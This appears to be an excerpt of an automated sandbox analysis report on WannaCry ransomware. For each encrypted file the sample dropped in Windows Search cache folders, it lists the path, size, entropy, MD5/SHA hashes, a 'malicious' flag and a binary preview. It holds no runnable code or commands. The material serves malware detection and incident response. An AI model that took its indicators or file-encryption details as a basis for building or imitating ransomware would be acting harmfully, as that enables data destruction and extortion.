                                SHA-256:43A44A5D0CC47E32F56AE156FAAE2678EC7666E0B42ED4BB8EB778440EFC89CD
                                SHA-512:AB4A7DC7B36FD6278033C6FE9886CFBF81521BE66EA936FBEB23193258E02FBDF73CEFA15FED56B6FCF40A81FA94608954874C59958B1E52955F92DC3F5FFE1E
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....]eZ).BxO@...}........HH..-n\W.tb..f......M5.2` .5.T...X.........._..z" .R.......S.OR.....@.p..]/Oa....e,..z..-,.Hy Z:'.|.]H:M=......3.s.oj&.3..22..V}..b..qi..w..J.&.....m.#...V..`.5..xp.q..p.s......5.o._...e.......1[..3.1.}.R..f%..?.%z.G.MG.....t.......;`..S]:w+..o_t........ !....l...]=..\..H..5..h..$xia..V...~.^<9b{..R.E..hF......m.\5...T$?wi.}...%.K.0....@0$).......l.I....`..*.p.r.......~.2...........:...!...w&.J.....y.u..H..N....x]N{....#D.S.[d.A..........<..S.mP....e......Iwe..\...'.g._....q.....xl.+.*y..Im.z=..u..H.C.....K..HK..-!Y.#.".F/d......I.....\ .j...C-.H6...O.....dI.~..?C...;..,..n..|.x..}j.....Q.|....l..@6.......V..\J..C.....~2s.j.......Y.... p'..;.H.{....}."Fy-0....#>u...Sx.>..0.....7S6.W.8.u...42m%.1mJV.s.{<....,.._g...*...S.x>.Qx...6\....V....F.2/... .....>'.&v.M.5'..2.?.k...>\..H..Q7t+H7...@......^`.!#..vZ.'2.]..W_.F0.7.... ..<.Q/.ca..Mw~Em..X..D.[.<N.%...h..R...s?...rx.@Mc6+:.H ^..O;~F.&.p......\lw.3'.Vt8.|m.

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1573144
                                Entropy (8bit):7.999893329010336
                                Encrypted:true
                                SSDEEP:49152:HabvSk4MyCdEL0qQgeuQI6BOQ72KbIW6hM1M:HabKRkdEoqQgrQ9kQ7V0W6hJ
                                MD5:6E5C201614FF5C332DD7C7F9099BAC8F
                                SHA1:DCF9A36532C4245320DC034E2CE88B56BFCFB06A
                                SHA-256:675B5E7FC0A3304C9A71AD92FA480AE4AA51AEB780C497FB6DF16B5945FC1C0A
                                SHA-512:DCE0019C408655A786EA372087495BCE906A96D2997CBB0B82E6B9A97AF0ABD6287623BB883BAA2EEE50E4F20EFDF9FCB6BB222F212B95AE1984FBF14AA09953
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.........'.. .........c.....?..&.7W...[....N.l.|YXE.9.M..}c.V..L7I......*.!...9qr!a.7.n.^.......Q..b.?.......!A;.."..A{.#9..q...Q.YU.K<.w...s.....4.3Dge...EW.H.<.-[.....S{..:a...p.......(`E...d....zn................#.Y=..F.ot.K9....%+.F*...?CY+...............t...J...i......h.&.!.]........Z....h...Nk.E;.x........P....Ns.XZ"..J\....-vB.e.b.l.....9s..?%K.H.6 =..h......\..D...07......Z.mO..#...oa.p....h.@Q...h...%.l.'..,......A....l@[.C..t..h..[4...b...X........aF?.8.x.....S..U...g.vkE..n.UZ..j.k.O.f.....&.UN..{7..Vf.2..#..8t.h.G.................b5....a.I3x.uK...`Ac...W...7..6...........6...%S....G.H1... 5..Cm......6...}Y%...]...u. Ip..X.b.......>b(.&.:)-0..........J..O,....4..+.....q^.#....#.K.I.....&l..*....T.......V...7.m...r....>BS..p.....>.l.#...._.B.....G%...9......r...q..hv...Y......r....S..E....z:........l...-j.........RZ;.\Ei...$X...^~.....#zJ.L....."...Z.....%...v}8...!Vp..0...sR.3..<.*... V.s.v..2Q...5.|..j.+{...i.

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.edb.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2097432
                                Entropy (8bit):7.999927097928958
                                Encrypted:true
                                SSDEEP:49152:9xisFctDTkzmdL9cZTQra8GQNqb+tvJ6HKvg/AtW/O2X/YkRQ9L:9AsOtnWsrYQNqkJ7DW/Z/BQ9L
                                MD5:DAD0BFEC204D84A28AB297E5BC2D4E6F
                                SHA1:96EC04EF881030A7338E1934C2A99DCB4B5AAFB2
                                SHA-256:D119D9A96A12E05D80D73E8EE4F96AE0AA73044255B1D71FEEC3E213434DDB89
                                SHA-512:DF536861910705DBB92098F9280F70F8900A358151553802537EE4A26ACE132A19217D4D94378498BFA0649B84BCE92DF445FD8D7A417D563FF070F0F5441C51
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....)f...f;J.w.dQ......6....0$....ku......'t"...v..A{o....P...R...f..9......N.T.Q^@Y..*m.x6.+.lCf..C.i_...I..C...J.u........=.K]).......W)...+"^sR.../`........5o.-...[.......cF1.....c..B....._p.........d&.[.m..qSw.=....).n.x...'..V.?...I..*...^.mfb...... ........s.D.R...%Z....Oi...k..........1..%...\2.h....b6./.b.........'....b.rr.*...y..i....{..i/.t.N....m#Q....I]R.K..q........2>_u|B._e.L.W....`....jz...D+....e5.P]f41.;U.0...V5`.V.^.B...9r..B....1 }H;./...:.[..m/..W...9..,..6...b.Li.[.R....c.a>I.0.".=.....|......$L..Ln(\..i.'[G..499:....[.z...xpt4.].O.0..%J.. ..s...%W..t/.O)IHE..'.9..c.....Q7a........y.F!..9....f..i.*...9.....%....].....y.v.y.J....<(./.....Y.u.f.;<$..R...P7..-.[.i.e..E..x.h...n....C..+I...0{.*Jt.H.W .TQM.....a.)H.H)F...'9W.p..K.mw.-...~..m.hj.J..L+G.........x.kN.l\.o......1.T.V.^.j....om.....yQ.3=s........$....P.*..H.ot.._VG..c..FY.D<.:....Q..1b..el.9..ip c..lf..q...$}.G..B...7f..x.T...7.....6......NJpg.........}.H

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{435eadfa-ef29-450c-8859-49b8fff38e28}\0.0.filtertrie.intermediate.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):38040
                                Entropy (8bit):7.994693055365256
                                Encrypted:true
                                SSDEEP:768:5MYM0FsCwu3MrGnPewdyKkySfqYM6LS7PaPbYUlbg2To:5PsCjmePbzS3M6LNA
                                MD5:662F34EBB1DDBE5FEBE8410ED9F73662
                                SHA1:70D2480FA291560DD6E8D2A7F01B68531017D7CF
                                SHA-256:D82FAB63D24811DDE7D2B419BD25037EB8380790EB6BC1313C2A408E1CA0068B
                                SHA-512:25EE210C7191167714751B8F00607D1FCADF90BA3EF3E66B3BA43CCCD35A7ECFB40F2B52C8AC04C7D1DE32DC93C57EC481EC9E9E2489038D6911BCF7899C6717
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!......o .r.uM...L0.G...@.5.A....}...i..PDq....R...J..^..3....n\.}..j.hc.....3..7..E...%h........P`..(....R.Fg.6'...:#4V.}hP.j7.....r`...o..^..?e.KXY......4..Dic..JM.......JFv..9...K.;R2...............@.1.o}.<t...g...$..9.6..!R.1.2.\l...V..[~:...f4....v.......H..E)d..W...m|.I,..].n..;=6..S.t.^.N...U.B?.M.S..Nc.....}.r.^...?.~:..,.;.G0..weL.a......tH.%...1../.i.*o...)..%.&.3..Q*....CQF;....Z.].@8...l?..%.w.v.q5...?"*....g..E...R.]!.w.;..RB..I..e..17....7I......@.1z[.."..'%#%...-L..]..P.......zj.......rC.*bj.>..W..ZQ.5..'P...K6.n......#..%......q.@...R.$.....u[...l.q..wI.I.&L#_.j.......9......}n.]....c-@.l....g.X..e.....&51f...NS`....4}..).. fLCy..^~....$g.M....B...I.7.........)sX....KI..mV.}..C... &..Y.X..)g.7.z.....:.....[.tW i...-.T;X...O.3 .fa)z.1...`...@......[.t[...n.....lRF.....[X...Z....J#.K.{...7...}c..A.....%..OY.....-...:.*..m.u.F#....F.$.<...8.4.}..P..XS;'.-.6...w.&......M..'E.....:...i..rqlQ..L.y...;......I

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{435eadfa-ef29-450c-8859-49b8fff38e28}\0.1.filtertrie.intermediate.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):296
                                Entropy (8bit):7.136588519832637
                                Encrypted:false
                                SSDEEP:6:bkETgLmDhBdSyUHihPXFPcnq0u69dRmxWqTDqAlII:bkEULKhnStHiZyndu+Kx5TTCI
                                MD5:1D86A4E9D94DD4307B57F9910A9E65EB
                                SHA1:13A607B0D358929CB7A18C509E7F77D9EA74CCFE
                                SHA-256:1BF26B9E0BFFD5616B750A271D418DD980D36D445BFED3DA39BF24D47AD36957
                                SHA-512:68D0B28D568B939B6BE6CD1FB921A0E288B4DA5588073C95AFF736D1051A77C1943892BD92F6FF745AEAA294A5E15023FED6E1659FEDCDD744017BE607307666
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....r.'..........._.v..}..::~f+6:3I.).%%..........l'..............TKF.wAb........H.U!...kW..l.Z."...B..F:<*;...Tw..,.X..w....n<.F.. -.p...Gr.pa..t......x/.GJ..F.~f.v.}3...>...*4.x}..}D[....4.>..A.G.>z+....|];d.N.i.....h3..?..*.8....*..d.H.R.q.M.............R..xt.@..Xv.W..

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{435eadfa-ef29-450c-8859-49b8fff38e28}\0.2.filtertrie.intermediate.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):296
                                Entropy (8bit):7.248141053645653
                                Encrypted:false
                                SSDEEP:6:bkEV2jD4+bpm9rZ26+YrhPz9MmUM2eVBnG/gWmWtGPb7yMl2GE:bkET+GrZxnrhPz9MjFWBG/JmWtGj7vq
                                MD5:C49062ADDE495F8CD047EE37E215BD93
                                SHA1:6FC4492E7802E621F95671C9D5AEAAD490F23345
                                SHA-256:DF4CFA3E090CFCDAE195B4750BD2951F4220D9E04EC08CC17CA9E08E36DF4213
                                SHA-512:75BC5B56F61880DEE072D6DDD612B8429BF2828734FC19184E4E16F9BED12A41447DDCF01B3D4B889751B0DB8A281653D1148D421D6430545FF6BF3EA0187E26
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....[M..W.../Xz...G(....4.<.s...@.Un~........!.z...B6):.._L...C.`..<f2:fO...G..-;e.Nj.0.........A>.PX&....`{O..f...6..vq.4.0~u>...c.q1:y.Y:..rG.._.......r}P...2.%.}....&O.}...e2m..c..+..........G.U.I9.l.r.E.{.Z.y3...|......^kD...fl....\..a...6h................8.r\...:.i.b.

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{6d27d8af-3d9b-4d29-b5de-77687cff7d14}\0.0.filtertrie.intermediate.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):38040
                                Entropy (8bit):7.995224439986361
                                Encrypted:true
                                SSDEEP:768:gevdwsOioGwWkopt71XQi+Hvk/iGk/fR3abt5a6dls1Ebz1EdWvT:gevdfOi9hksgk/VkHQh5a6dBbn
                                MD5:5D46E574464E9B8E1D39BC18B1006AAA
                                SHA1:E46F8A929325FDC049431FE10DD9BAA13B3ADE24
                                SHA-256:047C59015559514967CA1A8F49129E760CA13E4AEA18F5365379B171E4FFEA5F
                                SHA-512:AA7D20DB7C2364305B4B7F82FC0923E868AAB1B349772B6562FDC810B4D8B588D83CD4428E4C22FA1171FDDC9AB2D3EF6D8C198B4CB69D68DE050EF534690922
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....L.Y..+$.D.......N..e..z5..Q..+..y0....)~.<..?&..M.[....h..X...g'...../..f...A8tB..~P..}8.#.o.._.K...66.x..,o::....h..U.*...e&^..^.v..5)..h7...8=.!.C...u...C'...:...?.q..vc%.}5.yN...P$e..x.t.q..|..7.c......^:!..cI.MO..3...\...|.M9J< 7.V!N.o...+e....v.......?D.c|.?.Q6...1h....8}f.....u.C...o.2h...r'..aO...e.s..4i....#F..._N.*...g.N4....6...\D.HZ..no).].%o.^l.....+*. ..`.c..9...w.F._.)b.7..)..&...\^ W..;....3..I..=.(....%...WN,....Rv........._.S..G...p$.:...1:.....<.^%J.)nbf.u.v(.I.I*._.......rs.R)j..^.q..$....Cl6.....(.R..l...R..ve#e.)..\.]z......q...:Z.~oIm.....i.G....+....:...L......9..A,..0.G..&.n.g.....T;..I.#?....dP' v. ...$..m..`..H<..3........ex.....3.S...u\......".7;..k.C...-....6.@v..D..w4..X.[.........A..........w...%..:.V..X."..g........-.....K...+.=.m.<.v.%be....).u......f^..h.O..].y......>/..y...-J.Z.W!..<.me5.....ZO..}.m.....8$r.......t%[kbP...c].t..0..u......a&.i......"...[.\...AXq..f4.cu..}&.a+u+`..f....4).

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{6d27d8af-3d9b-4d29-b5de-77687cff7d14}\0.1.filtertrie.intermediate.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):296
                                Entropy (8bit):7.11558580840823
                                Encrypted:false
                                SSDEEP:6:bkE/OZ89U4kRUjgQ9SUlEdWJLn158meVh5GHEtgz0qgIL4PuK/ORdD:bkEHb/EU5V1yz5OpOPxWRB
                                MD5:07CCCA98D78D46058DA9DEF13B05FB48
                                SHA1:46C5D3E00EC33854BF94E450542EBB7AF8AAA789
                                SHA-256:9ED005F2EDC45F37E8454A4DA176076EF6D7B4816100B25C6C1E20A9C06469CA
                                SHA-512:22367A13A305575F270083855A6CC100BD58605437515F317AE79C130C2443D00ACD8A682BD08CBBF6F5D313726109778B81E3A4A2150742653E9ED460C5F038
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....!`V...P.2.#=.6@.~[0..'8..d.;\........R...\.....Q.-"O...i.........8N..WGr.5..T.yZpCI..D!..J.O.q.4}*c..B3..!..GN..DI.....y.......Z.m......U,T.t......K6......{..........!.K...ajU.1.@S.01D>..|,..........56e,.....W.Oj..-d._y..Pd2.>.p^..:..5.a..............bQ....d....p-..

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{6d27d8af-3d9b-4d29-b5de-77687cff7d14}\0.2.filtertrie.intermediate.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):296
                                Entropy (8bit):7.1552026245769875
                                Encrypted:false
                                SSDEEP:6:bkEpT2FxPXFM+ZOQgzN2UC2zS6jpSSEadVxlqxCIaIwNS:bkEUbPXFUQENzbJjpSSEavxlrM
                                MD5:DF95D77FFA72CC9A9520D9AC94FB5A76
                                SHA1:5A1551C5003BE899CBD58F963C798AA86034DEF7
                                SHA-256:4B1C6B47EBB89F9A2EDDC32420426832DC29DED1837D3123972309B67F07DC94
                                SHA-512:65D4ABFC89A9F62F01F4C31ED1AB9FDCE093876E0DEE513D08720B3457040568CEDED919818BC7B1811AAD95F7B7038CE41B4736D5E02F2F7E527F862479441E
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......../....i.O\...#.e.8.W~...S. `.*.H.......a.[.<..T_.?..m.1.:..#zO.e[..%..$.c..'.%X.YGf.Ju..A....B......%6.&.@.. ....E....0pIP..:!.f.d*.. ..S...Iz.Cpg..!e..>..m..uv.d...e..!.....yH...0........;...+.n"..9.F.....(....6T:....9.Xi]r...|.......X...=..H..............?..%.O.~.....[..

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{88c217c2-58f8-476c-acc3-37a9546e81a8}\0.0.filtertrie.intermediate.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):38040
                                Entropy (8bit):7.995452270200452
                                Encrypted:true
                                SSDEEP:768:Gb0/TpumAlDTnLVyqouJY5/qN1Uxk3H5NzLzKtmtGg/z2/u:28dlCneH5/qQxAFL22K/u
                                MD5:286D154FEA55B0B5DCCF7ED31941AF51
                                SHA1:9D5F547EE531B193EE0DADBEDEE7C4D85436EAF7
                                SHA-256:C6F2D298E0D78974039DB775D076AB09EBEE7EC530EC76BFC10AD23BC788B7C6
                                SHA-512:731E20C4E24C0537AEF51EA55F1DC08A51CCA643CE1A8B607B436876789332A305D231093FF54B975E3613DF1EDC61E8B89D18EF55CD70E6B1F8C6C6885B6C75
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....E..C.Lw...r?.p..4...u9=led......b.....t....Q.n......%.'...q..O.Q.....&a.H.....\.j?...k.%.........5<-.?...(./0".A..g|'U....P..._......Lq..s..G16f..........#.3..T8aOG..QH.K.c....!.*.Mt-\l....Cy..|...e..}|."tn...9..T.2..1tt.........D....5i.........v.........K.....E....%...Z".w....I.......;6h2.f..:o.rR....0....!!<...E..^..-.e.......C...wu...F...9...Y......n..0..<....tN..2......0p.V...?....q..Z..:.tjE.!/...f..I.0.pw2.^;.. !.G...*...q:.........(|uF....3........CBA.W7kz..uy.......$@....P..=.m......N.f.........r..q$.:...Y"........6E.,q...x.a.q.d).....a.l}..i=....S....X.%....|O.j..W.?TQ..a..s..==.{........e.;},)j#..L.S...t....Um..fr.T..6$..:g.#......J.T.z'....!k._.....d.......).....6.D.l...[.....O...{..zf.M...x.E.rr..CCj..s.x..l.D=..g..qr........1.rI..K....8j.@...g.......;.+:.Wz.....`.(.4F.wb.)%?.2C+B..)[.... n.l.~Ib.zfVC...3.L..|......W................d..........>....9.:.....k..D...=..v*8t.0...`t......1.r4.....2.E0.`.^.D.2.:2...P.K..._.

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{88c217c2-58f8-476c-acc3-37a9546e81a8}\0.1.filtertrie.intermediate.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):296
                                Entropy (8bit):7.162940780169734
                                Encrypted:false
                                SSDEEP:6:bkEJ/5AdkG91T9IcM5akG95dcCCWI4xSrPYJOIEjVgixnMgybgrC+Pz/gCfde:bkEN+dN91TqRe95dcCc4xSrPsujNNyki
                                MD5:88D18F8596B524AD01D0FCDC4C4EF862
                                SHA1:B9D7AAABF400CB099B462E0B580BFDEF2FC93323
                                SHA-256:19388E7CD21537A054A3E193F9562512CC4E17890E9A7B1601F9F1E56F2346C9
                                SHA-512:412F40E8BA47DF1E7A09F44751B9B350A40B201C9524761AFB52EE25462DE5B05D58B8480BA5F024743885B2A01617D9F088FC3D67064C2B23EB8AB3D990154B
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......!....mn.^..Z.O.v.N................n1(M.{...qa..).ZBm........H.. .JK.?+.d..i....}..W\1.$..@A*.SN....@p%)...b..V.....~.V.t.......g-.o.5V.?.9K.j..]..!C}.`..*J..vmx.....j...No....&..'T......Z...!2.|fH.r..........6....P..w..G.f...%zOn..E......................z*..x....uX..

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{88c217c2-58f8-476c-acc3-37a9546e81a8}\0.2.filtertrie.intermediate.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):296
                                Entropy (8bit):7.1784478425541325
                                Encrypted:false
                                SSDEEP:6:bkEnpF6dtpcAcFLMvwf4WD7H5zUF3R0uWXG/Ayg4/fw:bkEyncAqNX7HGFalqtgj
                                MD5:19861233D8B8741A30EF3AF1FFD16D19
                                SHA1:31D2754B3BAC10D91CC8EDA27E036F0AAFBF9C88
                                SHA-256:207947484A1EACC50A2C6D516C27C44F6A2496B0E7A5B7953C0DC588C96D7099
                                SHA-512:801736CD55EDDEE063BFC1456D01CE584A925688D7F5364C8E21D699E29C000BEEA2BDDEB6E9D4CB32B1008F51335020B9D1DD0EB1EB059C8F4772CD85DCB5C6
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......h..2..{9e.0........x&.rti.....g@.....7..R_......X[9.6m.sS.Q.>...:[..O.[.o..r.S.S..{.r.i...&.,......P.`.....d..oe..U....5..)xt.1..s....3@6..].._....%...0..cX.....!......*..(.H~B.#.2...j..M.........YwIi..k..I q..HP.x..b._.Q........j.....5.....H.............#t0.Z.[.*.A.t...

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ffa119a7-1647-4b3c-8c37-1046f5a858f2}\0.0.filtertrie.intermediate.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):38040
                                Entropy (8bit):7.995283190461034
                                Encrypted:true
                                SSDEEP:768:weKVzjpD5WTEqTlNVilU+vhYfyMpDmO+8s0FEsjiibSB4L/psMJ9u:wZVz1D5EEqRNWvhYfBpqO+8soSJM7u
                                MD5:A876257E7834F3EAF7C38E30214D409B
                                SHA1:701965B61A9B43678C5A568270637CD73371BEF2
                                SHA-256:4C5F743EA3917D33739D9FA22C3364310473BAC0994237556D776D356D2CC8F9
                                SHA-512:07744EB1E1559629A690C9F3E5E6BAA83EB6BC160BEDE439437E0A2278836CD9FDCA7C8EA8158B17E57C4B09254695F280E0BF15317175E6B1E20E97D075EADD
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....{....]u.Q.IE..W.O0..>!..6.....\...KT.._.u8.../.0.I..o,..Xy^7G.$%..^.O)+&<V.'.]m...1..+.-.8..i..Q.U3(+5...vB.F.......z.\.D9.8-.9..cXKU.3.8.S...Z..P...........c.r..Q......\....M<.>.j.. s.k.d.Q..Q..$WZ.H..J.g.;.i4^B..4........x....t.E.R.O.T2..F.........v........^...&ZDF.x..;+5/w....{.:Ep~.`.Eg..'...........'...P.&....G/.........Tu_+.-.4.2....Ws..+M..O.t+.I.....<T.u*..|.1...l.h%M.....|.;.=.....v.H..N.....s....x....z....~~.u=..[...I.@..p...b...,h.....(.....E`0..}.o.Qw.,.r$@. !i.2..e_&.....V...S.^;..m6..7..+U.J..e.I?.:.T.r...!...X....^.S...RcW.e<......E.m...>...yt_...V...q...#.............|._.\....r...W1..j.Z.#~A...J..C..6.t.u9q..?aCL..^...Z.I.]..b...J..Kf.........J|&Y......&.-...0.'p).Q.U.s.....g....o.#.....f...... c.m..Ush..2.....b.F...e[cJa.h..T0....iE..$.$..=..*W.w.@[.Fo.N+.@."..2d..]=...J..[V....P'!%..j.B...j.|...^.s."K...Q1.~'....."..9.g6k.G.*....&.X./r..o......&+N......t.....wi....~..(UeX..P..'9)..\c,;..jp.....=Z..u.m

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ffa119a7-1647-4b3c-8c37-1046f5a858f2}\0.1.filtertrie.intermediate.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):296
                                Entropy (8bit):7.130603683714442
                                Encrypted:false
                                SSDEEP:6:bkEvkUqSf1dee/uwVXXgoApjH3pr3/Y+nMRh9gfmJO/I/xR:bkE8Uq4dee/uqQoApjHi+nMRrvf/7
                                MD5:2F4EAB7657C3BAE35A5ACBCADF6DE7AD
                                SHA1:64EE3F2014D965BFCD2D1334039720755928D350
                                SHA-256:5A159B82BE706BB70045468DC74FC59E99C05AE3A7D8195443352E0D427F7B08
                                SHA-512:4C84405D2E3070AF7DFC78F05B7C463DBE33BB798F0855D1C9A6EF1782E3174F4A6101F15F6DCF6529A35B02F6B9B53A1E63E8F3C924EA475AAEFDBEB7906F78
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......L3........2..9.9.=.,.`.%;....@W..R.,.....b>..N.r.M..#B..$...E.&..;...qf...Z.ZW+i.......M...7.h.e.l.5?m.....p.X.G-.%..."k...SP..d.p...`Io.ql.F...{..@.j.w...-..I.Tc.`.d..uf..Vz.].q..K.7......ui5K>rR.+.cUx........q....d.XES.y(5....&Pw.nUfv.fHx.V.m............#...........w.

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ffa119a7-1647-4b3c-8c37-1046f5a858f2}\0.2.filtertrie.intermediate.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):296
                                Entropy (8bit):7.152389365805461
                                Encrypted:false
                                SSDEEP:6:bkESb8Bu/ezwlJhXOQUau6wjdZ5SN1U06XghchSl/E2K3x:bkEOSuHJhtqbsfGYchWjQ
                                MD5:45DF573EE1C5CA5E3829AABA3D6CE673
                                SHA1:A26A8BE3E6581F3F0BA30F0D0B8EC7AD387EAA5F
                                SHA-256:9423A4A4A213B66A2F9C6C355EDFB27BCD6E4389795EB3C8AC75455EF66A10D5
                                SHA-512:6E7283EB96F7C1B510825859566E3583CFEF3ACD0C978E306CCE5D07C38EDFAB38DB8CBCD634B93E6D1C1F3C9E3D106127573CC021020824788BA8D41EB7FA04
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....NC....r"..G....H&.f1.C..../..-...^..h.-.......:.....c.k.<U...*B.......n...........).......-......L;g..~.....=yrsU".Y.1.[...e.t5...U...}.....xbB].'w.......3.N.n..\...Z.".B..b..w.....'O..........o...'%Y9...p..Es9.......& ..2.um.y.3...Y..j..$C...3...3................$eT.x..).....

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\appsconversions.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1426184
                                Entropy (8bit):7.99985256158353
                                Encrypted:true
                                SSDEEP:24576:lYUm6gESFXPxnNydZgREymbTtJr4j/tTg8+WC2T0jOuG40Fmz5ze/bOzSU95:lYUm6VuPxN8mREDDr4j//TdwjlL4mNUO
                                MD5:813F957D188BB9AEDB7B137D1644EEE8
                                SHA1:03645D02A41D20A35556D3314BF1034D0CF99751
                                SHA-256:A8B0ECB27F2D496729C53F31E73A68BBFF1900AD1927D593DC05CF9238B215B0
                                SHA-512:7C122B2FDEC7CC03F75D39D3ACA5766A04552C60B690888A21F1216644F80010ABBDA063DCC11112C29EB25CB33F2F4CD05D8BA682E1BB42BCE596EABB077CA8
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!......i.^.C..[.)..k.....U...iH.=2.G}........2....Q...lr.W/.R.n.$..c<'t..<t..=....Y.cn....Op\].^..D.........v..G.J#'7A...N...F.....E....[.q...T.t+.]A@.h....5G.g`h.F..%...u.8...1...j.'*....jW..Q.....I.p..).!...U\...d....I.f.V....N...a..y.P.(............ .d._8K@.bt.i.g...o.F..:..Q.D...p....+@o_......Z.1.4.p..YDb...V..h.iNx..cD_*.<_"./.....}...UiP...4QRi/....Z...r...u.thd.w..w.X......B.b.d...$=\.I....%Qs.....(.F..B..I1.....au..;.s.G...U.3(..A.....~.e.t..JF(...9.t)]2..#.).8..8..<{FF.%%M.......t..i"...]0/.$.m......6^...J._.....2...4.ko.f..[|....M....CyPU..... .i...C.c.d1v. .v.7.....H..!W.&..QQ.;s...|..dA..Z.../3V.[.zcyzB....J..(.H.`w.fi..t}T.+8.nQ...-....1u. .=..Mg}...7c.)|..E....o....R...S....x.k.S`mem..z..{...'.\bZ:....).t.....G.@..8D.{.&...y.....:.......,.P....s...t....1b-5/...0....?Io.T{...E......aiwr.f..O.|.iP.J.|....T....K.*..Q9.....5....ct...J.d8X.v.#......];<...R=.B...oU..$\o.I...Z..4!...J.p....sr...x=M.~_4\.H.E4.n......

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\appsglobals.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):352008
                                Entropy (8bit):7.9993808630216225
                                Encrypted:true
                                SSDEEP:6144:TTy9MfdlQJiF25R3Tp1Ag0UYce7YPGjimfCYdXmJwE1SSlB2rkCKKtoDCy:TT8MFkiF25nAU3gsuZj211PlcrwAO
                                MD5:815F95E5EB3F533A70FEA15F2BCC6B48
                                SHA1:5D46518F396A4018476C6A943F526A1E2D42EEC9
                                SHA-256:693C29D7877F7EC4B1229127260465FB738A1CF6427EE96F12B49776575F7136
                                SHA-512:E854D870C2CCFD0F9099E3621E109FD37D6A95009E96D87292584C1ED6BC0B97143399B19B420884CDD0B0E9A931D65FEEE027D72A6B0CBC7569EA1FCC1A5C67
                                Malicious:true
